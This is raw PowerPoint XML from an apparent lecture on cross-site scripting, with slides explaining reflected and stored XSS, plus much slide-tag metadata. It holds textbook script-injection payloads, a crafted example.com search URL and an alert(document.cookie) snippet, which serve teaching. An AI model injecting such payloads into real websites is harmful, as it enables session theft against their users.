            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="192024" y="867512"/>
            <a:ext cx="4588523" cy="3763103"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a website with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>reflective behavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> takes user inputs, then:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers can put JavaScript code in the input, so when the input is reflected back, the JavaScript code will be injected into the web page from the website. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{166629FD-1B18-4D25-8992-F32D151D63BD}"/>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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="888888"/>
              </a:solidFill>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39114880-F083-4DE6-AE58-B7FFD919A2CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716542" y="1608387"/>
            <a:ext cx="4253722" cy="2598532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1246378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BC73-7543-4E6E-86F6-C9CCB1D076AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attack (cont.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8A6E449-9257-4BC1-A51F-1A98F216FA60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assume a vulnerable service on website : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.example.com/search?input=word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>word</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is provided by the users.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now the attacker sends the following URL to the victim and tricks him to click the link: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://www.example.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>search?input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1650" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;alert(“attack”);&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="975" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once the victim clicks on this link, an HTTP GET request will be sent to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.example.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>web server, which returns a page containing the search result, with the original input in the page. The input here is a JavaScript code which runs and gives a pop-up message on the victim’s browser.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1EB66B3-01F3-4ACE-A313-4F988E56B400}"/>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="888888"/>
              </a:solidFill>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="576624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F94E-0939-45FB-9E36-191996DF0FF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Persistent (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9AD3BFB-377A-4DDB-A118-9973A0073B3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="192024" y="867512"/>
            <a:ext cx="4829981" cy="3763103"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers directly send their data to a target website/server which stores the data in a persistent storage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the website later sends the stored data to other users, it creates a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>channel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> between the users and the attackers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="750" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: User profile in a social network is a channel as it is set by one user and viewed by another.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{391B9E8A-5913-4231-9A05-F2A55582D707}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="888888"/>
                </a:solidFill>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="888888"/>
              </a:solidFill>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A407B2C-B58C-40B2-B4B9-2B27F9969293}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5022005" y="1549825"/>
            <a:ext cx="3948259" cy="2398475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="496946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8.465927"/>
  <p:tag name="ORIGINALWIDTH" val="157.6137"/>
  <p:tag name="LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\usepackage{upquote}&#10;\usepackage{alltt}&#10;\pagestyle{empty}&#10;\begin{document}&#10;&#10;\begin{alltt}&#10;&lt;script&gt;alert(document.cookie);&lt;/script&gt;&#10;\end{alltt}&#10;&#10;&#10;\end{document}"/>
  <p:tag name="IGUANATEXSIZE" val="22"/>
  <p:tag name="IGUANATEXCURSOR" val="175"/>
  <p:tag name="TRANSPARENCY" val="True"/>
  <p:tag name="FILENAME" val=""/>
  <p:tag name="LATEXENGINEID" val="0"/>
  <p:tag name="TEMPFOLDER" val="C:\Temp\"/>
  <p:tag name="LATEXFORMHEIGHT" val="312"/>
  <p:tag name="LATEXFORMWIDTH" val="384"/>
  <p:tag name="LATEXFORMWRAP" val="True"/>
  <p:tag name="BITMAPVECTOR" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.863636"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag100.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.863636"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag101.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.602291"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\usepackage{upquote}&#10;\usepackage{alltt}&#10;\pagestyle{empty}&#10;\begin{document}&#10;&#10;\begin{alltt}&#10;&lt;script&gt;alert(document.cookie);&lt;/script&gt;&#10;\end{alltt}&#10;&#10;&#10;\end{document}"/>
  <p:tag name="IGUANATEXSIZE" val="22"/>
  <p:tag name="IGUANATEXCURSOR" val="175"/>
  <p:tag name="TRANSPARENCY" val="True"/>
  <p:tag name="FILENAME" val=""/>
  <p:tag name="LATEXENGINEID" val="0"/>
  <p:tag name="TEMPFOLDER" val="C:\Temp\"/>
  <p:tag name="LATEXFORMHEIGHT" val="312"/>
  <p:tag name="LATEXFORMWIDTH" val="384"/>
  <p:tag name="LATEXFORMWRAP" val="True"/>
  <p:tag name="BITMAPVECTOR" val="1"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag102.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.090909"/>
  <p:tag name="ORIGINALWIDTH" val="2.897745"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag103.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.090909"/>
  <p:tag name="ORIGINALWIDTH" val="3.011382"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag104.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.034109"/>
  <p:tag name="ORIGINALWIDTH" val="3.409091"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag105.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.625018"/>
  <p:tag name="ORIGINALWIDTH" val="2.897745"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag106.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="6.136364"/>
  <p:tag name="ORIGINALWIDTH" val="3.636364"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag107.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.113636"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag108.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.602291"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag109.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.090909"/>
  <p:tag name="ORIGINALWIDTH" val="3.579563"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag11.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.829563"/>
  <p:tag name="ORIGINALWIDTH" val="3.579563"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag110.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.625018"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag111.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.090909"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag112.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.034109"/>
  <p:tag name="ORIGINALWIDTH" val="3.409091"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag113.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.113636"/>
  <p:tag name="ORIGINALWIDTH" val="3.238654"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag114.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="7.159091"/>
  <p:tag name="ORIGINALWIDTH" val="1.988654"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag115.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.681818"/>
  <p:tag name="ORIGINALWIDTH" val="3.636364"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag116.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.090909"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag117.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.090909"/>
  <p:tag name="ORIGINALWIDTH" val="2.954545"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag118.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.034109"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag119.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.034109"/>
  <p:tag name="ORIGINALWIDTH" val="3.920472"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag12.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.522727"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag120.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.090909"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag121.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.034109"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag122.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.113636"/>
  <p:tag name="ORIGINALWIDTH" val="3.238654"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag123.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="1.136364"/>
  <p:tag name="ORIGINALWIDTH" val="0.9659269"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag124.xml><?xml version="1.0" encoding="utf-8"?>
